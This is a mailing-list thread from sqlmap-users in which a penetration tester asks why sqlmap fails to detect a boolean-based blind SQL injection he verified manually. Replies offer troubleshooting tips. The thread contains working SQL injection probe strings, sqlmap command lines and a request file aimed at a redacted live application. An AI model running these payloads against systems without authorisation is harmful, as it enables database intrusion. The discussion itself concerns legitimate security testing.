>>> >> Connection: close
>>> >> Referer: <redacted>
>>> >> Cookie: <redacted>
>>> >>
>>> >> I've redacted some of the details as it's not appropriate to draw
>>> >> attention to an internet facing application's SQLi vulnerability.
>>> >>
>>> >> When providing the request file as part of the following command:
>>> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
>>> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
>>> >> 'industries' -v 1
>>> >>
>>> >> sqlmap executes as normal but cannot identify (and therefore cannot
>>> >> exploit) the boolean-based blind vulnerability which I've verified
>>> >> manually.
>>> >>
>>> >> Thanks again,
>>> >>
>>> >> Al.
>>> >>
>>> >>
>>> >> On Tue, Apr 28, 2015 at 9:59 PM, Miroslav Stampar
>>> >> <mir...@gm...> wrote:
>>> >> > And what is the content of request file?
>>> >> >
>>> >> > Bye
>>> >> >
>>> >> > On Tue, Apr 28, 2015 at 1:03 PM, Alistair Johnson
>>> >> > <amc...@gm...>
>>> >> > wrote:
>>> >> >>
>>> >> >> Hi sqlmappers,
>>> >> >>
>>> >> >> I'm a fairly experienced user of sqlmap having used it extensively
>>> in
>>> >> >> the past. I came across what appeared to pretty typical
>>> boolean-based
>>> >> >> blind SQLi in an application I'm (legally) testing. However, for
>>> the
>>> >> >> first time, I'm unable to get sqlmap to recognise the parameter as
>>> >> >> vulnerable to exploit it further. And as we know, manually
>>> exploiting
>>> >> >> blind SQLi is cumbersome to say the least.
>>> >> >>
>>> >> >> Here is a summary of the requests i've made to manually confirm the
>>> >> >> vulnerability.
>>> >> >>
>>> >> >> /help/UserGuide.aspx?Sec=PackageSelection (returns response A)
>>> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns
>>> response
>>> >> >> A)
>>> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns
>>> response
>>> >> >> B)
>>> >> >>
>>> >> >> I've tried various sqlmap flags and thought the following command
>>> >> >> would give me the best chance of success:
>>> >> >>
>>> >> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
>>> >> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
>>> >> >> 'industries' -v 1
>>> >> >>
>>> >> >> Note: the string 'industries' is text that appears in response A
>>> but
>>> >> >> not response B.
>>> >> >>
>>> >> >> I've looked at the requests that sqlmap is sending in the
>>> background
>>> >> >> (proxied through burp). It appears that it's attempting to exploit
>>> >> >> this with the AND statement as it should but is not using single
>>> >> >> quotes as per my example above.
>>> >> >>
>>> >> >> I'd appreciate any insight. If this is a shortcoming in sqlmap,
>>> i'd be
>>> >> >> more than happy to contribute some time to improve it so it can
>>> >> >> identify injectable parameters such as these in the future.
>>> >> >>
>>> >> >> Thanks,
>>> >> >>
>>> >> >> Al.
>>> >> >>
>>> >> >>
>>> >> >>
>>> >> >>
>>> ------------------------------------------------------------------------------
>>> >> >> One dashboard for servers and applications across
>>> >> >> Physical-Virtual-Cloud
>>> >> >> Widest out-of-the-box monitoring support with 50+ applications
>>> >> >> Performance metrics, stats and reports that give you Actionable
>>> >> >> Insights
>>> >> >> Deep dive visibility with transaction tracing using APM Insight.
>>> >> >> http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
>>> >> >> _______________________________________________
>>> >> >> sqlmap-users mailing list
>>> >> >> sql...@li...
>>> >> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>> >> >
>>> >> >
>>> >> >
>>> >> >
>>> >> > --
>>> >> > Miroslav Stampar
>>> >> > http://about.me/stamparm
>>> >
>>> >
>>> >
>>> >
>>> > --
>>> > Miroslav Stampar
>>> > http://about.me/stamparm
>>> >
>>> >
>>> ------------------------------------------------------------------------------
>>> > One dashboard for servers and applications across
>>> Physical-Virtual-Cloud
>>> > Widest out-of-the-box monitoring support with 50+ applications
>>> > Performance metrics, stats and reports that give you Actionable
>>> Insights
>>> > Deep dive visibility with transaction tracing using APM Insight.
>>> > http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
>>> >
>>> > _______________________________________________
>>> > sqlmap-users mailing list
>>> > sql...@li...
>>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>
>>
>>
>> --
>> http://volatile-minds.blogspot.com -- blog
>> http://www.volatileminds.net -- website
>>
>
>
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
>



-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

Re: [sqlmap-users] Unable to identify injectable parameter in fairly typical boolean-based blind SQLi

[Brandon P. <bpe...@gm...>]

Technically, it shouldn't*

On Tue, Apr 28, 2015 at 9:07 AM, Brandon Perry <bpe...@gm...>
wrote:

> The injections I see like those are all suffixed with the start of a
> comment (# or --). So, technically it should matter if single quotes are
> used in the latter part of the boolean clause.
>
> For instance, SELECT * FROM blah WHERE foo = 'fdsa' with value 'fdsa'
> being injectable. Using fdsa' AND 1=1# would result with the trailing
> single quote being part of the comment and ignored by MySQL.
>
> Can you exploit the injection by hand using 1=1# or 1=1--?
>
> On Tue, Apr 28, 2015 at 8:15 AM, Alistair Johnson <amc...@gm...>
> wrote:
>
>> Hi Brandon,
>>
>> Thanks for your comment. Confirming that i've tried risk=3 with
>> level=5 with the same results. I've looked more closely at the
>> requests that sqlmap is sending to check if the parameter is
>> injectable. It is testing the Sec paramater with values such as:
>>
>> PackageSelection) AND 1477=7114
>> PackageSelection) AND 1631=1631
>> PackageSelection') AND 5603=7729
>> PackageSelection') AND 1631=1631
>> PackageSelection' AND 3943=9381
>> PackageSelection' AND 1631=1631
>> PackageSelection" AND 3324=4690
>> PackageSelection" AND 1631=1631
>> PackageSelection) AND 4734=6616 AND (6346=6346
>> PackageSelection)) AND 7350=9272 AND (8861=8861
>>
>> When in fact, i assume it would need to use logic like I used to get
>> distinguishable responses:
>>
>> PackageSelection (returns response A)
>> PackageSelection' AND '1'='1 (returns response A)
>> PackageSelection' AND '1'='2 (returns response B)
>>
>> In a nutshell, it doesn't appear to be trying single quotes and values
>> in the ' AND '1'='1 pattern. But i would have thought this is a pretty
>> typical format for checking boolean-based blind SQLi.
>>
>> Cheers,
>>
>> Alistair.
>>
>> On Tue, Apr 28, 2015 at 10:36 PM, Brandon Perry
>> <bpe...@gm...> wrote:
>> > It's a GET, so there wouldn't be a content type, unless I am mistaken.
>> >
>> > Alistair, have you tried --risk=3 with --level=5 yet?
>> >
>> > Sent from a phone
>> >
>> > On Apr 28, 2015, at 7:13 AM, Miroslav Stampar <
>> mir...@gm...>
>> > wrote:
>> >
>> > Can you please send the unredacted content of request.txt to my address?
>> >
>> > If not, then please at least send me the content of traffic file which
>> you
>> > can obtain by just appending the "-t traffic.txt" to the regular
>> sqlmap's
>> > run.
>> >
>> > Bye
>> >
>> > On Tue, Apr 28, 2015 at 2:10 PM, Alistair Johnson <
>> amc...@gm...>
>> > wrote:
>> >>
>> >> Thanks for the quick reply.
>> >>
>> >> The contents of the request file are as follows:
>> >>
>> >> GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1
>> >> Host: <redacted>
>> >> Accept: */*
>> >> Accept-Language: en
>> >> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64;
>> >> x64; Trident/5.0)
>> >> Connection: close
>> >> Referer: <redacted>
>> >> Cookie: <redacted>
>> >>
>> >> I've redacted some of the details as it's not appropriate to draw
>> >> attention to an internet facing application's SQLi vulnerability.
>> >>
>> >> When providing the request file as part of the following command:
>> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
>> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
>> >> 'industries' -v 1
>> >>
>> >> sqlmap executes as normal but cannot identify (and therefore cannot
>> >> exploit) the boolean-based blind vulnerability which I've verified
>> >> manually.
>> >>
>> >> Thanks again,
>> >>
>> >> Al.
>> >>
>> >>
>> >> On Tue, Apr 28, 2015 at 9:59 PM, Miroslav Stampar
>> >> <mir...@gm...> wrote:
>> >> > And what is the content of request file?
>> >> >
>> >> > Bye
>> >> >
>> >> > On Tue, Apr 28, 2015 at 1:03 PM, Alistair Johnson
>> >> > <amc...@gm...>
>> >> > wrote:
>> >> >>
>> >> >> Hi sqlmappers,
>> >> >>
>> >> >> I'm a fairly experienced user of sqlmap having used it extensively
>> in
>> >> >> the past. I came across what appeared to pretty typical
>> boolean-based
>> >> >> blind SQLi in an application I'm (legally) testing. However, for the
>> >> >> first time, I'm unable to get sqlmap to recognise the parameter as
>> >> >> vulnerable to exploit it further. And as we know, manually
>> exploiting
>> >> >> blind SQLi is cumbersome to say the least.
>> >> >>
>> >> >> Here is a summary of the requests i've made to manually confirm the
>> >> >> vulnerability.
>> >> >>
>> >> >> /help/UserGuide.aspx?Sec=PackageSelection (returns response A)
>> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns
>> response
>> >> >> A)
>> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns
>> response
>> >> >> B)
>> >> >>
>> >> >> I've tried various sqlmap flags and thought the following command
>> >> >> would give me the best chance of success:
>> >> >>
>> >> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
>> >> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
>> >> >> 'industries' -v 1
>> >> >>
>> >> >> Note: the string 'industries' is text that appears in response A but
>> >> >> not response B.
>> >> >>
>> >> >> I've looked at the requests that sqlmap is sending in the background
>> >> >> (proxied through burp). It appears that it's attempting to exploit
>> >> >> this with the AND statement as it should but is not using single
>> >> >> quotes as per my example above.
>> >> >>
>> >> >> I'd appreciate any insight. If this is a shortcoming in sqlmap, i'd
>> be
>> >> >> more than happy to contribute some time to improve it so it can
>> >> >> identify injectable parameters such as these in the future.
>> >> >>
>> >> >> Thanks,
>> >> >>
>> >> >> Al.
>> >> >>
>> >> >>
>> >> >>
>> >> >>
>> ------------------------------------------------------------------------------
>> >> >> One dashboard for servers and applications across
>> >> >> Physical-Virtual-Cloud
>> >> >> Widest out-of-the-box monitoring support with 50+ applications
>> >> >> Performance metrics, stats and reports that give you Actionable
>> >> >> Insights
>> >> >> Deep dive visibility with transaction tracing using APM Insight.
>> >> >> http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
>> >> >> _______________________________________________
>> >> >> sqlmap-users mailing list
>> >> >> sql...@li...
>> >> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >> >
>> >> >
>> >> >
>> >> >
>> >> > --
>> >> > Miroslav Stampar
>> >> > http://about.me/stamparm
>> >
>> >
>> >
>> >
>> > --
>> > Miroslav Stampar
>> > http://about.me/stamparm
>> >
>> >
>> ------------------------------------------------------------------------------
>> > One dashboard for servers and applications across Physical-Virtual-Cloud
>> > Widest out-of-the-box monitoring support with 50+ applications
>> > Performance metrics, stats and reports that give you Actionable Insights
>> > Deep dive visibility with transaction tracing using APM Insight.
>> > http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
>> >
>> > _______________________________________________
>> > sqlmap-users mailing list
>> > sql...@li...
>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
>
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
>



-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

Re: [sqlmap-users] Unable to identify injectable parameter in fairly typical boolean-based blind SQLi

[Brandon P. <bpe...@gm...>]

The injections I see like those are all suffixed with the start of a
comment (# or --). So, technically it should matter if single quotes are
used in the latter part of the boolean clause.

For instance, SELECT * FROM blah WHERE foo = 'fdsa' with value 'fdsa' being
injectable. Using fdsa' AND 1=1# would result with the trailing single
quote being part of the comment and ignored by MySQL.

Can you exploit the injection by hand using 1=1# or 1=1--?

On Tue, Apr 28, 2015 at 8:15 AM, Alistair Johnson <amc...@gm...>
wrote:

> Hi Brandon,
>
> Thanks for your comment. Confirming that i've tried risk=3 with
> level=5 with the same results. I've looked more closely at the
> requests that sqlmap is sending to check if the parameter is
> injectable. It is testing the Sec paramater with values such as:
>
> PackageSelection) AND 1477=7114
> PackageSelection) AND 1631=1631
> PackageSelection') AND 5603=7729
> PackageSelection') AND 1631=1631
> PackageSelection' AND 3943=9381
> PackageSelection' AND 1631=1631
> PackageSelection" AND 3324=4690
> PackageSelection" AND 1631=1631
> PackageSelection) AND 4734=6616 AND (6346=6346
> PackageSelection)) AND 7350=9272 AND (8861=8861
>
> When in fact, i assume it would need to use logic like I used to get
> distinguishable responses:
>
> PackageSelection (returns response A)
> PackageSelection' AND '1'='1 (returns response A)
> PackageSelection' AND '1'='2 (returns response B)
>
> In a nutshell, it doesn't appear to be trying single quotes and values
> in the ' AND '1'='1 pattern. But i would have thought this is a pretty
> typical format for checking boolean-based blind SQLi.
>
> Cheers,
>
> Alistair.
>
> On Tue, Apr 28, 2015 at 10:36 PM, Brandon Perry
> <bpe...@gm...> wrote:
> > It's a GET, so there wouldn't be a content type, unless I am mistaken.
> >
> > Alistair, have you tried --risk=3 with --level=5 yet?
> >
> > Sent from a phone
> >
> > On Apr 28, 2015, at 7:13 AM, Miroslav Stampar <
> mir...@gm...>
> > wrote:
> >
> > Can you please send the unredacted content of request.txt to my address?
> >
> > If not, then please at least send me the content of traffic file which
> you
> > can obtain by just appending the "-t traffic.txt" to the regular sqlmap's
> > run.
> >
> > Bye
> >
> > On Tue, Apr 28, 2015 at 2:10 PM, Alistair Johnson <amc...@gm...
> >
> > wrote:
> >>
> >> Thanks for the quick reply.
> >>
> >> The contents of the request file are as follows:
> >>
> >> GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1
> >> Host: <redacted>
> >> Accept: */*
> >> Accept-Language: en
> >> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64;
> >> x64; Trident/5.0)
> >> Connection: close
> >> Referer: <redacted>
> >> Cookie: <redacted>
> >>
> >> I've redacted some of the details as it's not appropriate to draw
> >> attention to an internet facing application's SQLi vulnerability.
> >>
> >> When providing the request file as part of the following command:
> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
> >> 'industries' -v 1
> >>
> >> sqlmap executes as normal but cannot identify (and therefore cannot
> >> exploit) the boolean-based blind vulnerability which I've verified
> >> manually.
> >>
> >> Thanks again,
> >>
> >> Al.
> >>
> >>
> >> On Tue, Apr 28, 2015 at 9:59 PM, Miroslav Stampar
> >> <mir...@gm...> wrote:
> >> > And what is the content of request file?
> >> >
> >> > Bye
> >> >
> >> > On Tue, Apr 28, 2015 at 1:03 PM, Alistair Johnson
> >> > <amc...@gm...>
> >> > wrote:
> >> >>
> >> >> Hi sqlmappers,
> >> >>
> >> >> I'm a fairly experienced user of sqlmap having used it extensively in
> >> >> the past. I came across what appeared to pretty typical boolean-based
> >> >> blind SQLi in an application I'm (legally) testing. However, for the
> >> >> first time, I'm unable to get sqlmap to recognise the parameter as
> >> >> vulnerable to exploit it further. And as we know, manually exploiting
> >> >> blind SQLi is cumbersome to say the least.
> >> >>
> >> >> Here is a summary of the requests i've made to manually confirm the
> >> >> vulnerability.
> >> >>
> >> >> /help/UserGuide.aspx?Sec=PackageSelection (returns response A)
> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns
> response
> >> >> A)
> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns
> response
> >> >> B)
> >> >>
> >> >> I've tried various sqlmap flags and thought the following command
> >> >> would give me the best chance of success:
> >> >>
> >> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
> >> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
> >> >> 'industries' -v 1
> >> >>
> >> >> Note: the string 'industries' is text that appears in response A but
> >> >> not response B.
> >> >>
> >> >> I've looked at the requests that sqlmap is sending in the background
> >> >> (proxied through burp). It appears that it's attempting to exploit
> >> >> this with the AND statement as it should but is not using single
> >> >> quotes as per my example above.
> >> >>
> >> >> I'd appreciate any insight. If this is a shortcoming in sqlmap, i'd
> be
> >> >> more than happy to contribute some time to improve it so it can
> >> >> identify injectable parameters such as these in the future.
> >> >>
> >> >> Thanks,
> >> >>
> >> >> Al.
> >> >>
> >> >>
> >> >>
> >> >>
> ------------------------------------------------------------------------------
> >> >> One dashboard for servers and applications across
> >> >> Physical-Virtual-Cloud
> >> >> Widest out-of-the-box monitoring support with 50+ applications
> >> >> Performance metrics, stats and reports that give you Actionable
> >> >> Insights
> >> >> Deep dive visibility with transaction tracing using APM Insight.
> >> >> http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
> >> >> _______________________________________________
> >> >> sqlmap-users mailing list
> >> >> sql...@li...
> >> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >> >
> >> >
> >> >
> >> >
> >> > --
> >> > Miroslav Stampar
> >> > http://about.me/stamparm
> >
> >
> >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
> >
> >
> ------------------------------------------------------------------------------
> > One dashboard for servers and applications across Physical-Virtual-Cloud
> > Widest out-of-the-box monitoring support with 50+ applications
> > Performance metrics, stats and reports that give you Actionable Insights
> > Deep dive visibility with transaction tracing using APM Insight.
> > http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
> >
> > _______________________________________________
> > sqlmap-users mailing list
> > sql...@li...
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

Re: [sqlmap-users] Unable to identify injectable parameter in fairly typical boolean-based blind SQLi

[Alistair J. <amc...@gm...>]

Hi Brandon,

Thanks for your comment. Confirming that i've tried risk=3 with
level=5 with the same results. I've looked more closely at the
requests that sqlmap is sending to check if the parameter is
injectable. It is testing the Sec paramater with values such as:

PackageSelection) AND 1477=7114
PackageSelection) AND 1631=1631
PackageSelection') AND 5603=7729
PackageSelection') AND 1631=1631
PackageSelection' AND 3943=9381
PackageSelection' AND 1631=1631
PackageSelection" AND 3324=4690
PackageSelection" AND 1631=1631
PackageSelection) AND 4734=6616 AND (6346=6346
PackageSelection)) AND 7350=9272 AND (8861=8861

When in fact, i assume it would need to use logic like I used to get
distinguishable responses:

PackageSelection (returns response A)
PackageSelection' AND '1'='1 (returns response A)
PackageSelection' AND '1'='2 (returns response B)

In a nutshell, it doesn't appear to be trying single quotes and values
in the ' AND '1'='1 pattern. But i would have thought this is a pretty
typical format for checking boolean-based blind SQLi.

Cheers,

Alistair.

On Tue, Apr 28, 2015 at 10:36 PM, Brandon Perry
<bpe...@gm...> wrote:
> It's a GET, so there wouldn't be a content type, unless I am mistaken.
>
> Alistair, have you tried --risk=3 with --level=5 yet?
>
> Sent from a phone
>
> On Apr 28, 2015, at 7:13 AM, Miroslav Stampar <mir...@gm...>
> wrote:
>
> Can you please send the unredacted content of request.txt to my address?
>
> If not, then please at least send me the content of traffic file which you
> can obtain by just appending the "-t traffic.txt" to the regular sqlmap's
> run.
>
> Bye
>
> On Tue, Apr 28, 2015 at 2:10 PM, Alistair Johnson <amc...@gm...>
> wrote:
>>
>> Thanks for the quick reply.
>>
>> The contents of the request file are as follows:
>>
>> GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1
>> Host: <redacted>
>> Accept: */*
>> Accept-Language: en
>> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64;
>> x64; Trident/5.0)
>> Connection: close
>> Referer: <redacted>
>> Cookie: <redacted>
>>
>> I've redacted some of the details as it's not appropriate to draw
>> attention to an internet facing application's SQLi vulnerability.
>>
>> When providing the request file as part of the following command:
>> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
>> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
>> 'industries' -v 1
>>
>> sqlmap executes as normal but cannot identify (and therefore cannot
>> exploit) the boolean-based blind vulnerability which I've verified
>> manually.
>>
>> Thanks again,
>>
>> Al.
>>
>>
>> On Tue, Apr 28, 2015 at 9:59 PM, Miroslav Stampar
>> <mir...@gm...> wrote:
>> > And what is the content of request file?
>> >
>> > Bye
>> >
>> > On Tue, Apr 28, 2015 at 1:03 PM, Alistair Johnson
>> > <amc...@gm...>
>> > wrote:
>> >>
>> >> Hi sqlmappers,
>> >>
>> >> I'm a fairly experienced user of sqlmap having used it extensively in
>> >> the past. I came across what appeared to pretty typical boolean-based
>> >> blind SQLi in an application I'm (legally) testing. However, for the
>> >> first time, I'm unable to get sqlmap to recognise the parameter as
>> >> vulnerable to exploit it further. And as we know, manually exploiting
>> >> blind SQLi is cumbersome to say the least.
>> >>
>> >> Here is a summary of the requests i've made to manually confirm the
>> >> vulnerability.
>> >>
>> >> /help/UserGuide.aspx?Sec=PackageSelection (returns response A)
>> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns response
>> >> A)
>> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns response
>> >> B)
>> >>
>> >> I've tried various sqlmap flags and thought the following command
>> >> would give me the best chance of success:
>> >>
>> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
>> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
>> >> 'industries' -v 1
>> >>
>> >> Note: the string 'industries' is text that appears in response A but
>> >> not response B.
>> >>
>> >> I've looked at the requests that sqlmap is sending in the background
>> >> (proxied through burp). It appears that it's attempting to exploit
>> >> this with the AND statement as it should but is not using single
>> >> quotes as per my example above.
>> >>
>> >> I'd appreciate any insight. If this is a shortcoming in sqlmap, i'd be
>> >> more than happy to contribute some time to improve it so it can
>> >> identify injectable parameters such as these in the future.
>> >>
>> >> Thanks,
>> >>
>> >> Al.
>> >>
>> >>
>> >>
>> >> ------------------------------------------------------------------------------
>> >> One dashboard for servers and applications across
>> >> Physical-Virtual-Cloud
>> >> Widest out-of-the-box monitoring support with 50+ applications
>> >> Performance metrics, stats and reports that give you Actionable
>> >> Insights
>> >> Deep dive visibility with transaction tracing using APM Insight.
>> >> http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
>> >> _______________________________________________
>> >> sqlmap-users mailing list
>> >> sql...@li...
>> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >
>> >
>> >
>> >
>> > --
>> > Miroslav Stampar
>> > http://about.me/stamparm
>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
> ------------------------------------------------------------------------------
> One dashboard for servers and applications across Physical-Virtual-Cloud
> Widest out-of-the-box monitoring support with 50+ applications
> Performance metrics, stats and reports that give you Actionable Insights
> Deep dive visibility with transaction tracing using APM Insight.
> http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Re: [sqlmap-users] Unable to identify injectable parameter in fairly typical boolean-based blind SQLi

[Brandon P. <bpe...@gm...>]

It's a GET, so there wouldn't be a content type, unless I am mistaken. 

Alistair, have you tried --risk=3 with --level=5 yet?

Sent from a phone

> On Apr 28, 2015, at 7:13 AM, Miroslav Stampar <mir...@gm...> wrote:
> 
> Can you please send the unredacted content of request.txt to my address?
> 
> If not, then please at least send me the content of traffic file which you can obtain by just appending the "-t traffic.txt" to the regular sqlmap's run.
> 
> Bye
> 
>> On Tue, Apr 28, 2015 at 2:10 PM, Alistair Johnson <amc...@gm...> wrote:
>> Thanks for the quick reply.
>> 
>> The contents of the request file are as follows:
>> 
>> GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1
>> Host: <redacted>
>> Accept: */*
>> Accept-Language: en
>> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64;
>> x64; Trident/5.0)
>> Connection: close
>> Referer: <redacted>
>> Cookie: <redacted>
>> 
>> I've redacted some of the details as it's not appropriate to draw
>> attention to an internet facing application's SQLi vulnerability.
>> 
>> When providing the request file as part of the following command:
>> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
>> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
>> 'industries' -v 1
>> 
>> sqlmap executes as normal but cannot identify (and therefore cannot
>> exploit) the boolean-based blind vulnerability which I've verified
>> manually.
>> 
>> Thanks again,
>> 
>> Al.
>> 
>> 
>> On Tue, Apr 28, 2015 at 9:59 PM, Miroslav Stampar
>> <mir...@gm...> wrote:
>> > And what is the content of request file?
>> >
>> > Bye
>> >
>> > On Tue, Apr 28, 2015 at 1:03 PM, Alistair Johnson <amc...@gm...>
>> > wrote:
>> >>
>> >> Hi sqlmappers,
>> >>
>> >> I'm a fairly experienced user of sqlmap having used it extensively in
>> >> the past. I came across what appeared to pretty typical boolean-based
>> >> blind SQLi in an application I'm (legally) testing. However, for the
>> >> first time, I'm unable to get sqlmap to recognise the parameter as
>> >> vulnerable to exploit it further. And as we know, manually exploiting
>> >> blind SQLi is cumbersome to say the least.
>> >>
>> >> Here is a summary of the requests i've made to manually confirm the
>> >> vulnerability.
>> >>
>> >> /help/UserGuide.aspx?Sec=PackageSelection (returns response A)
>> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns response A)
>> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns response B)
>> >>
>> >> I've tried various sqlmap flags and thought the following command
>> >> would give me the best chance of success:
>> >>
>> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
>> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
>> >> 'industries' -v 1
>> >>
>> >> Note: the string 'industries' is text that appears in response A but
>> >> not response B.
>> >>
>> >> I've looked at the requests that sqlmap is sending in the background
>> >> (proxied through burp). It appears that it's attempting to exploit
>> >> this with the AND statement as it should but is not using single
>> >> quotes as per my example above.
>> >>
>> >> I'd appreciate any insight. If this is a shortcoming in sqlmap, i'd be
>> >> more than happy to contribute some time to improve it so it can
>> >> identify injectable parameters such as these in the future.
>> >>
>> >> Thanks,
>> >>
>> >> Al.
>> >>
>> >>
>> >> ------------------------------------------------------------------------------
>> >> One dashboard for servers and applications across Physical-Virtual-Cloud
>> >> Widest out-of-the-box monitoring support with 50+ applications
>> >> Performance metrics, stats and reports that give you Actionable Insights
>> >> Deep dive visibility with transaction tracing using APM Insight.
>> >> http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
>> >> _______________________________________________
>> >> sqlmap-users mailing list
>> >> sql...@li...
>> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >
>> >
>> >
>> >
>> > --
>> > Miroslav Stampar
>> > http://about.me/stamparm
> 
> 
> 
> -- 
> Miroslav Stampar
> http://about.me/stamparm
> ------------------------------------------------------------------------------
> One dashboard for servers and applications across Physical-Virtual-Cloud 
> Widest out-of-the-box monitoring support with 50+ applications
> Performance metrics, stats and reports that give you Actionable Insights
> Deep dive visibility with transaction tracing using APM Insight.
> http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Re: [sqlmap-users] Unable to identify injectable parameter in fairly typical boolean-based blind SQLi

[Miroslav S. <mir...@gm...>]

Can you please send the unredacted content of request.txt to my address?

If not, then please at least send me the content of traffic file which you
can obtain by just appending the "-t traffic.txt" to the regular sqlmap's
run.

Bye

On Tue, Apr 28, 2015 at 2:10 PM, Alistair Johnson <amc...@gm...>
wrote:

> Thanks for the quick reply.
>
> The contents of the request file are as follows:
>
> GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1
> Host: <redacted>
> Accept: */*
> Accept-Language: en
> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64;
> x64; Trident/5.0)
> Connection: close
> Referer: <redacted>
> Cookie: <redacted>
>
> I've redacted some of the details as it's not appropriate to draw
> attention to an internet facing application's SQLi vulnerability.
>
> When providing the request file as part of the following command:
> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
> 'industries' -v 1
>
> sqlmap executes as normal but cannot identify (and therefore cannot
> exploit) the boolean-based blind vulnerability which I've verified
> manually.
>
> Thanks again,
>
> Al.
>
>
> On Tue, Apr 28, 2015 at 9:59 PM, Miroslav Stampar
> <mir...@gm...> wrote:
> > And what is the content of request file?
> >
> > Bye
> >
> > On Tue, Apr 28, 2015 at 1:03 PM, Alistair Johnson <amc...@gm...
> >
> > wrote:
> >>
> >> Hi sqlmappers,
> >>
> >> I'm a fairly experienced user of sqlmap having used it extensively in
> >> the past. I came across what appeared to pretty typical boolean-based
> >> blind SQLi in an application I'm (legally) testing. However, for the
> >> first time, I'm unable to get sqlmap to recognise the parameter as
> >> vulnerable to exploit it further. And as we know, manually exploiting
> >> blind SQLi is cumbersome to say the least.
> >>
> >> Here is a summary of the requests i've made to manually confirm the
> >> vulnerability.
> >>
> >> /help/UserGuide.aspx?Sec=PackageSelection (returns response A)
> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns response
> A)
> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns response
> B)
> >>
> >> I've tried various sqlmap flags and thought the following command
> >> would give me the best chance of success:
> >>
> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
> >> 'industries' -v 1
> >>
> >> Note: the string 'industries' is text that appears in response A but
> >> not response B.
> >>
> >> I've looked at the requests that sqlmap is sending in the background
> >> (proxied through burp). It appears that it's attempting to exploit
> >> this with the AND statement as it should but is not using single
> >> quotes as per my example above.
